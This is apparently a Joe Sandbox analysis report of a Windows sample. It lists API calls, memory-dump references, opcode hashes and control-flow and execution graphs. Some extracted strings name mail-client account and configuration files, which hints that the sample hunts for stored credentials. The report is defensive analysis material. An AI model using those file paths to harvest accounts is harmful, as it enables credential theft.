                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 33A31E89: lstrlenW.KERNEL32(?,?,?,?,?,33A310DF,?,?,?,00000000), ref: 33A31E9A
                                                                                                                                                                                                                                      • Part of subcall function 33A31E89: lstrcatW.KERNEL32(?,?,?,33A310DF,?,?,?,00000000), ref: 33A31EAC
                                                                                                                                                                                                                                      • Part of subcall function 33A31E89: lstrlenW.KERNEL32(?,?,33A310DF,?,?,?,00000000), ref: 33A31EB3
                                                                                                                                                                                                                                      • Part of subcall function 33A31E89: lstrlenW.KERNEL32(?,?,33A310DF,?,?,?,00000000), ref: 33A31EC8
                                                                                                                                                                                                                                      • Part of subcall function 33A31E89: lstrcatW.KERNEL32(?,33A310DF,?,33A310DF,?,?,?,00000000), ref: 33A31ED3
                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 33A3122A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.30678203142.0000000033A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678167030.0000000033A30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678203142.0000000033A46000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_33a30000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlen$lstrcat$AttributesFile
                                                                                                                                                                                                                                    • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                                                                    • API String ID: 1475205934-1520055953
                                                                                                                                                                                                                                    • Opcode ID: 344c874afe3fdcdff4d3de1661270004096b4e465eda08e7fae92368e45babb2
                                                                                                                                                                                                                                    • Instruction ID: 1c4b3fb8e950681af44ca23739680335f613f78dfce67a70b3d65027b0d37b3e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 344c874afe3fdcdff4d3de1661270004096b4e465eda08e7fae92368e45babb2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB218179E513086AEB10A6A4EC82BED7339EF81B24F100557FA04EB2D0EAB15D858759

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 358 33a34b39-33a34b61 GetModuleHandleExW 359 33a34b63-33a34b76 GetProcAddress 358->359 360 33a34b86-33a34b8a 358->360 361 33a34b85 359->361 362 33a34b78-33a34b83 359->362 363 33a34b95-33a34ba2 call 33a32ada 360->363 364 33a34b8c-33a34b8f FreeLibrary 360->364 361->360 362->361 364->363
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,33A34AEA,?,?,33A34A8A,?,33A42238,?,33A34BBD,00000000,00000000), ref: 33A34B59
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 33A34B6C
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,33A34AEA,?,?,33A34A8A,?,33A42238,?,33A34BBD,00000000,00000000,?,33A32082), ref: 33A34B8F
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.30678203142.0000000033A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678167030.0000000033A30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678203142.0000000033A46000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_33a30000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                    • Opcode ID: 3d3eed2b3bd35c1feceacee58d21d2ed51899deaeb3ea6eb8512b68543898f6b
                                                                                                                                                                                                                                    • Instruction ID: 7c0dedd7a852344128dfac9c69df9b5aa0a2b0ccd22eeee31d1ab2a40a6485e9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d3eed2b3bd35c1feceacee58d21d2ed51899deaeb3ea6eb8512b68543898f6b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07F03175901208EFDB11AF68CC08B9D7FB9EF46771F404159F905A6150DB319952CB50
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,33A39C07,?,00000000,?,00000000,00000000), ref: 33A394D4
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 33A39590
                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,33A39C07,00000000,?,?,?,?,?,?,?,?,?,33A39C07,?), ref: 33A395AF
                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,33A39C07,00000000,?,?,?,?,?,?,?,?,?,33A39C07,?), ref: 33A395E8
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.30678203142.0000000033A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678167030.0000000033A30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678203142.0000000033A46000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_33a30000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileWrite$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 977765425-0
                                                                                                                                                                                                                                    • Opcode ID: ad99df3f1c36be8a3038f19e1fad802853d9baa3187ced1c086cf83c86854ef8
                                                                                                                                                                                                                                    • Instruction ID: 6083d59af5e5e3ba5d9d7acdb7250b0d822bad1ba9b9a52bffb29a04942cddbb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ad99df3f1c36be8a3038f19e1fad802853d9baa3187ced1c086cf83c86854ef8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72518EB1905349AFDB00CFA8C895BDEBBF8EF0A320F54411EE956E7291D7309942CB60
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,33A310DF,?,?,?,00000000), ref: 33A31E9A
                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,33A310DF,?,?,?,00000000), ref: 33A31EAC
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,33A310DF,?,?,?,00000000), ref: 33A31EB3
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,33A310DF,?,?,?,00000000), ref: 33A31EC8
                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,33A310DF,?,33A310DF,?,?,?,00000000), ref: 33A31ED3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.30678203142.0000000033A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678167030.0000000033A30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678203142.0000000033A46000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_33a30000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 493641738-0
                                                                                                                                                                                                                                    • Opcode ID: a34f8beaff4118a6874a768b89263fe28083942ab20112f03e97280c29fe7f9e
                                                                                                                                                                                                                                    • Instruction ID: 9a19655ba22254c7b66f788531ec205cca534651b19a8e024fa711cd94aca04f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a34f8beaff4118a6874a768b89263fe28083942ab20112f03e97280c29fe7f9e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34F05E2A502310BAD621372AEC85EBFBBBCEF87F70F54001AFA09931909B55585393A5
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,33A3190E,?,?,00000000,?,00000000), ref: 33A31643
                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,33A3190E,?,?,00000000,?,00000000,?,?,?,?), ref: 33A3165A
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,33A3190E,?,?,00000000,?,00000000,?,?,?,?,?), ref: 33A31661
                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00001008,?,?,?,?,?,33A3190E,?,?,00000000,?,00000000,?,?,?,?), ref: 33A31686
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.30678203142.0000000033A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678167030.0000000033A30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678203142.0000000033A46000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_33a30000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrcatlstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1475610065-0
                                                                                                                                                                                                                                    • Opcode ID: 25d629e6534841309b07d71fbbd1e2887dd343462bbfe212961d6b278a8c98ee
                                                                                                                                                                                                                                    • Instruction ID: 37275ab788504f0dd3cd63772f6bda8f26b51e0f838b65438f83081d5229496b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 25d629e6534841309b07d71fbbd1e2887dd343462bbfe212961d6b278a8c98ee
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D21DA36D01304ABD704EB68DD85EEE77B8EF89730F14402BED05AB241EB34A54287A5
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 33A3715C
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 33A3717F
                                                                                                                                                                                                                                      • Part of subcall function 33A356D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 33A35702
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 33A371A5
                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 33A371C7
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.30678203142.0000000033A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678167030.0000000033A30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678203142.0000000033A46000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_33a30000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1794362364-0
                                                                                                                                                                                                                                    • Opcode ID: 2b4f0ec715f07c5a037e42df01ccc26fac091c4fe18c3e4f553862016d886249
                                                                                                                                                                                                                                    • Instruction ID: 0206bcf80c37b275db2a5940668cfc8b32c4dd17e3f32af7f6def6333afafe5a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b4f0ec715f07c5a037e42df01ccc26fac091c4fe18c3e4f553862016d886249
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE0188B7A03715BB63121ABA5C48D7B7AADDAC3FB1354012FBD04D7214EE628C0389B0
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,33A31D66,00000000,00000000,?,33A35C88,33A31D66,00000000,00000000,00000000,?,33A35E85,00000006,FlsSetValue), ref: 33A35D13
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,33A35C88,33A31D66,00000000,00000000,00000000,?,33A35E85,00000006,FlsSetValue,33A3E190,FlsSetValue,00000000,00000364,?,33A35BC8), ref: 33A35D1F
                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,33A35C88,33A31D66,00000000,00000000,00000000,?,33A35E85,00000006,FlsSetValue,33A3E190,FlsSetValue,00000000), ref: 33A35D2D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.30678203142.0000000033A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678167030.0000000033A30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678203142.0000000033A46000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_33a30000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                                                                    • Opcode ID: 855cd25fc9f069aec4534dd1cb7e254b832872e9e6d79e649cc5173425b83194
                                                                                                                                                                                                                                    • Instruction ID: ffdf4c884a461d8d5170493c9b71b7c4ae3c2426cb2c1da4f4d20c4e6542cd6e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 855cd25fc9f069aec4534dd1cb7e254b832872e9e6d79e649cc5173425b83194
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20017576612322ABD7129A6DDC89A967798EF07BF1B540B25FD06E7140DB20D813CAE0

                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                    Execution Coverage:6.7%
                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                                                                                    Signature Coverage:3.2%
                                                                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                                                                    Total number of Limit Nodes:81
                                                                                                                                                                                                                                    execution_graph 37632 44dea5 37633 44deb5 FreeLibrary 37632->37633 37634 44dec3 37632->37634 37633->37634 37635 4287c1 37636 4287d2 37635->37636 37639 429ac1 37635->37639 37640 428818 37636->37640 37641 42881f 37636->37641 37651 425711 37636->37651 37637 4259da 37698 416760 11 API calls 37637->37698 37650 425ad6 37639->37650 37705 415c56 11 API calls 37639->37705 37672 42013a 37640->37672 37700 420244 97 API calls 37641->37700 37643 4260dd 37699 424251 120 API calls 37643->37699 37646 4259c2 37646->37650 37692 415c56 11 API calls 37646->37692 37651->37637 37651->37639 37651->37646 37654 422aeb memset memcpy memcpy 37651->37654 37655 429a4d 37651->37655 37661 4260a1 37651->37661 37671 425a38 37651->37671 37688 4227f0 memset memcpy 37651->37688 37689 422b84 15 API calls 37651->37689 37690 422b5d memset memcpy memcpy 37651->37690 37691 422640 13 API calls 37651->37691 37693 4241fc 11 API calls 37651->37693 37694 42413a 90 API calls 37651->37694 37654->37651 37656 429a66 37655->37656 37657 429a9b 37655->37657 37701 415c56 11 API calls 37656->37701 37660 429a96 37657->37660 37703 416760 11 API calls 37657->37703 37704 424251 120 API calls 37660->37704 37697 415c56 11 API calls 37661->37697 37663 429a7a 37702 416760 11 API calls 37663->37702 37671->37646 37695 422640 13 API calls 37671->37695 37696 4226e0 12 API calls 37671->37696 37673 42014c 37672->37673 37676 420151 37672->37676 37715 41e466 97 API calls 37673->37715 37675 420162 37675->37651 37676->37675 37677 4201b3 37676->37677 37678 420229 37676->37678 37679 4201b8 37677->37679 37680 4201dc 37677->37680 37678->37675 37681 41fd5e 86 API calls 37678->37681 37706 41fbdb 37679->37706 37680->37675 37684 4201ff 37680->37684 37712 41fc4c 37680->37712 37681->37675 37684->37675 37687 42013a 97 API calls 37684->37687 37687->37675 37688->37651 37689->37651 37690->37651 37691->37651 37692->37637 37693->37651 37694->37651 37695->37671 37696->37671 37697->37637 37698->37643 37699->37650 37700->37651 37701->37663 37702->37660 37703->37660 37704->37639 37705->37637 37707 41fbf1 37706->37707 37708 41fbf8 37706->37708 37711 41fc39 37707->37711 37730 4446ce 11 API calls 37707->37730 37720 41ee26 37708->37720 37711->37675 37716 41fd5e 37711->37716 37713 41ee6b 86 API calls 37712->37713 37714 41fc5d 37713->37714 37714->37680 37715->37676 37719 41fd65 37716->37719 37717 41fdab 37717->37675 37718 41fbdb 86 API calls 37718->37719 37719->37717 37719->37718 37721 41ee41 37720->37721 37722 41ee32 37720->37722 37731 41edad 37721->37731 37734 4446ce 11 API calls 37722->37734 37726 41ee3c 37726->37707 37728 41ee58 37728->37726 37736 41ee6b 37728->37736 37730->37711 37740 41be52 37731->37740 37734->37726 37735 41eb85 11 API calls 37735->37728 37737 41ee70 37736->37737 37738 41ee78 37736->37738 37793 41bf99 86 API calls 37737->37793 37738->37726 37741 41be6f 37740->37741 37742 41be5f 37740->37742 37747 41be8c 37741->37747 37772 418c63 memset memset 37741->37772 37771 4446ce 11 API calls 37742->37771 37744 41be69 37744->37726 37744->37735 37747->37744 37748 41bf3a 37747->37748 37750 41bed1 37747->37750 37752 41bee7 37747->37752 37775 4446ce 11 API calls 37748->37775 37751 41bef0 37750->37751 37754 41bee2 37750->37754 37751->37752 37753 41bf01 37751->37753 37752->37744 37776 41a453 86 API calls 37752->37776 37755 41bf24 memset 37753->37755 37757 41bf14 37753->37757 37773 418a6d memset memcpy memset 37753->37773 37761 41ac13 37754->37761 37755->37744 37774 41a223 memset memcpy memset 37757->37774 37760 41bf20 37760->37755 37762 41ac3f memset 37761->37762 37763 41ac52 37761->37763 37768 41acd9 37762->37768 37765 41ac6a 37763->37765 37777 41dc14 19 API calls 37763->37777 37766 41aca1 37765->37766 37778 41519d 37765->37778 37766->37768 37769 41acc0 memset 37766->37769 37770 41accd memcpy 37766->37770 37768->37752 37769->37768 37770->37768 37771->37744 37772->37747 37773->37757 37774->37760 37775->37752 37777->37765 37781 4175ed 37778->37781 37789 417570 SetFilePointer 37781->37789 37784 41760a ReadFile 37785 417637 37784->37785 37786 417627 GetLastError 37784->37786 37787 4151b3 37785->37787 37788 41763e memset 37785->37788 37786->37787 37787->37766 37788->37787 37790 4175b2 37789->37790 37791 41759c GetLastError 37789->37791 37790->37784 37790->37787 37791->37790 37792 4175a8 GetLastError 37791->37792 37792->37790 37793->37738 37794 417bc5 37795 417c61 37794->37795 37796 417bda 37794->37796 37796->37795 37797 417bf6 UnmapViewOfFile CloseHandle 37796->37797 37799 417c2c 37796->37799 37801 4175b7 37796->37801 37797->37796 37797->37797 37799->37796 37806 41851e 20 API calls 37799->37806 37802 4175d6 CloseHandle 37801->37802 37803 4175c8 37802->37803 37804 4175df 37802->37804 37803->37804 37805 4175ce Sleep 37803->37805 37804->37796 37805->37802 37806->37799 37807 4152c7 malloc 37808 4152ef 37807->37808 37810 4152e2 37807->37810 37811 416760 11 API calls 37808->37811 37811->37810 37812 4232e8 37813 4232ef 37812->37813 37816 415b2c 37813->37816 37815 423305 37817 415b42 37816->37817 37820 415b46 37816->37820 37818 415b94 37817->37818 37817->37820 37821 415b5a 37817->37821 37823 4438b5 37818->37823 37820->37815 37821->37820 37822 415b79 memcpy 37821->37822 37822->37820 37824 4438d0 37823->37824 37834 4438c9 37823->37834 37837 415378 memcpy memcpy 37824->37837 37834->37820 37838 41276d 37839 41277d 37838->37839 37881 4044a4 LoadLibraryW 37839->37881 37841 412785 37842 412789 37841->37842 37889 414b81 37841->37889 37845 4127c8 37895 412465 memset ??2@YAPAXI 37845->37895 37847 4127ea 37907 40ac21 37847->37907 37852 412813 37925 40dd07 memset 37852->37925 37853 412827 37930 40db69 memset 37853->37930 37856 412822 37951 4125b6 ??3@YAXPAX 37856->37951 37858 40ada2 _wcsicmp 37860 41283d 37858->37860 37860->37856 37863 412863 CoInitialize 37860->37863 37935 41268e 37860->37935 37955 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37863->37955 37866 41296f 37957 40b633 37866->37957 37868 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37873 412957 CoUninitialize 37868->37873 37878 4128ca 37868->37878 37873->37856 37874 4128d0 TranslateAcceleratorW 37875 412941 GetMessageW 37874->37875 37874->37878 37875->37873 37875->37874 37876 412909 IsDialogMessageW 37876->37875 37876->37878 37877 4128fd IsDialogMessageW 37877->37875 37877->37876 37878->37874 37878->37876 37878->37877 37879 41292b TranslateMessage DispatchMessageW 37878->37879 37880 41291f IsDialogMessageW 37878->37880 37879->37875 37880->37875 37880->37879 37882 4044f7 37881->37882 37883 4044cf GetProcAddress 37881->37883 37887 404507 MessageBoxW 37882->37887 37888 40451e 37882->37888 37884 4044e8 FreeLibrary 37883->37884 37885 4044df 37883->37885 37884->37882 37886 4044f3 37884->37886 37885->37884 37886->37882 37887->37841 37888->37841 37890 414b8a 37889->37890 37891 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37889->37891 37961 40a804 memset 37890->37961 37891->37845 37894 414b9e GetProcAddress 37894->37891 37896 4124e0 37895->37896 37897 412505 ??2@YAPAXI 37896->37897 37898 412521 37897->37898 37899 41251c 37897->37899 37972 444722 37898->37972 37983 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37899->37983 37906 41259b wcscpy 37906->37847 37988 40b1ab free free 37907->37988 37909 40ad76 37989 40aa04 37909->37989 37912 40a9ce malloc memcpy free free 37915 40ac5c 37912->37915 37913 40ad4b 37913->37909 38012 40a9ce 37913->38012 37915->37909 37915->37912 37915->37913 37916 40ace7 free 37915->37916 37992 40a8d0 37915->37992 38004 4099f4 37915->38004 37916->37915 37920 40a8d0 7 API calls 37920->37909 37921 40ada2 37922 40adc9 37921->37922 37923 40adaa 37921->37923 37922->37852 37922->37853 37923->37922 37924 40adb3 _wcsicmp 37923->37924 37924->37922 37924->37923 38017 40dce0 37925->38017 37927 40dd3a GetModuleHandleW 38022 40dba7 37927->38022 37931 40dce0 3 API calls 37930->37931 37932 40db99 37931->37932 38094 40dae1 37932->38094 38108 402f3a 37935->38108 37937 412766 37937->37856 37937->37863 37938 4126d3 _wcsicmp 37939 4126a8 37938->37939 37939->37937 37939->37938 37941 41270a 37939->37941 38143 4125f8 7 API calls 37939->38143 37941->37937 38111 411ac5 37941->38111 37952 4125da 37951->37952 37953 4125f0 37952->37953 37954 4125e6 DeleteObject 37952->37954 37956 40b1ab free free 37953->37956 37954->37953 37955->37868 37956->37866 37958 40b640 37957->37958 37959 40b639 free 37957->37959 37960 40b1ab free free 37958->37960 37959->37958 37960->37842 37962 40a83b GetSystemDirectoryW 37961->37962 37963 40a84c wcscpy 37961->37963 37962->37963 37968 409719 wcslen 37963->37968 37966 40a881 LoadLibraryW 37967 40a886 37966->37967 37967->37891 37967->37894 37969 409724 37968->37969 37970 409739 wcscat LoadLibraryW 37968->37970 37969->37970 37971 40972c wcscat 37969->37971 37970->37966 37970->37967 37971->37970 37973 444732 37972->37973 37974 444728 DeleteObject 37972->37974 37984 409cc3 37973->37984 37974->37973 37976 412551 37977 4010f9 37976->37977 37978 401130 37977->37978 37979 401134 GetModuleHandleW LoadIconW 37978->37979 37980 401107 wcsncat 37978->37980 37981 40a7be 37979->37981 37980->37978 37982 40a7d2 37981->37982 37982->37906 37982->37982 37983->37898 37987 409bfd memset wcscpy 37984->37987 37986 409cdb CreateFontIndirectW 37986->37976 37987->37986 37988->37915 37990 40aa14 37989->37990 37991 40aa0a free 37989->37991 37990->37921 37991->37990 37993 40a8eb 37992->37993 37994 40a8df wcslen 37992->37994 37995 40a906 free 37993->37995 37996 40a90f 37993->37996 37994->37993 37997 40a919 37995->37997 37998 4099f4 3 API calls 37996->37998 37999 40a932 37997->37999 38000 40a929 free 37997->38000 37998->37997 38002 4099f4 3 API calls 37999->38002 38001 40a93e memcpy 38000->38001 38001->37915 38003 40a93d 38002->38003 38003->38001 38005 409a41 38004->38005 38006 4099fb malloc 38004->38006 38005->37915 38008 409a37 38006->38008 38009 409a1c 38006->38009 38008->37915 38010 409a30 free 38009->38010 38011 409a20 memcpy 38009->38011 38010->38008 38011->38010 38013 40a9e7 38012->38013 38014 40a9dc free 38012->38014 38015 4099f4 3 API calls 38013->38015 38016 40a9f2 38014->38016 38015->38016 38016->37920 38041 409bca GetModuleFileNameW 38017->38041 38019 40dce6 wcsrchr 38020 40dcf5 38019->38020 38021 40dcf9 wcscat 38019->38021 38020->38021 38021->37927 38042 44db70 38022->38042 38024 40dbb4 memset memset 38044 409bca GetModuleFileNameW 38024->38044 38026 40dbfd 38045 4447d9 38026->38045 38029 40dc34 wcscpy wcscpy 38071 40d6f5 38029->38071 38030 40dc1f wcscpy 38030->38029 38033 40d6f5 3 API calls 38034 40dc73 38033->38034 38035 40d6f5 3 API calls 38034->38035 38036 40dc89 38035->38036 38037 40d6f5 3 API calls 38036->38037 38038 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38037->38038 38077 40da80 38038->38077 38041->38019 38043 44db77 38042->38043 38043->38024 38043->38043 38044->38026 38047 4447f4 38045->38047 38046 40dc1b 38046->38029 38046->38030 38047->38046 38048 444807 ??2@YAPAXI 38047->38048 38049 44481f 38048->38049 38050 444873 _snwprintf 38049->38050 38051 4448ab wcscpy 38049->38051 38084 44474a 8 API calls 38050->38084 38053 4448bb 38051->38053 38085 44474a 8 API calls 38053->38085 38054 4448a7 38054->38051 38054->38053 38056 4448cd 38086 44474a 8 API calls 38056->38086 38058 4448e2 38087 44474a 8 API calls 38058->38087 38060 4448f7 38088 44474a 8 API calls 38060->38088 38062 44490c 38089 44474a 8 API calls 38062->38089 38064 444921 38090 44474a 8 API calls 38064->38090 38066 444936 38091 44474a 8 API calls 38066->38091 38068 44494b 38092 44474a 8 API calls 38068->38092 38070 444960 ??3@YAXPAX 38070->38046 38072 44db70 38071->38072 38073 40d702 memset GetPrivateProfileStringW 38072->38073 38074 40d752 38073->38074 38075 40d75c WritePrivateProfileStringW 38073->38075 38074->38075 38076 40d758 38074->38076 38075->38076 38076->38033 38078 44db70 38077->38078 38079 40da8d memset 38078->38079 38080 40daac LoadStringW 38079->38080 38083 40dac6 38080->38083 38082 40dade 38082->37856 38083->38080 38083->38082 38093 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38083->38093 38084->38054 38085->38056 38086->38058 38087->38060 38088->38062 38089->38064 38090->38066 38091->38068 38092->38070 38093->38083 38104 409b98 GetFileAttributesW 38094->38104 38096 40daea 38097 40daef wcscpy wcscpy GetPrivateProfileIntW 38096->38097 38103 40db63 38096->38103 38105 40d65d GetPrivateProfileStringW 38097->38105 38099 40db3e 38106 40d65d GetPrivateProfileStringW 38099->38106 38101 40db4f 38107 40d65d GetPrivateProfileStringW 38101->38107 38103->37858 38104->38096 38105->38099 38106->38101 38107->38103 38144 40eaff 38108->38144 38112 411ae2 memset 38111->38112 38113 411b8f 38111->38113 38184 409bca GetModuleFileNameW 38112->38184 38125 411a8b 38113->38125 38115 411b0a wcsrchr 38116 411b22 wcscat 38115->38116 38117 411b1f 38115->38117 38185 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38116->38185 38117->38116 38119 411b67 38186 402afb 38119->38186 38123 411b7f 38242 40ea13 SendMessageW memset SendMessageW 38123->38242 38126 402afb 27 API calls 38125->38126 38127 411ac0 38126->38127 38128 4110dc 38127->38128 38129 41113e 38128->38129 38134 4110f0 38128->38134 38267 40969c LoadCursorW SetCursor 38129->38267 38131 411143 38268 444a54 38131->38268 38271 4032b4 38131->38271 38289 40b1ab free free 38131->38289 38132 4110f7 _wcsicmp 38132->38134 38133 411157 38135 40ada2 _wcsicmp 38133->38135 38134->38129 38134->38132 38290 410c46 10 API calls 38134->38290 38138 411167 38135->38138 38136 4111af 38138->38136 38139 4111a6 qsort 38138->38139 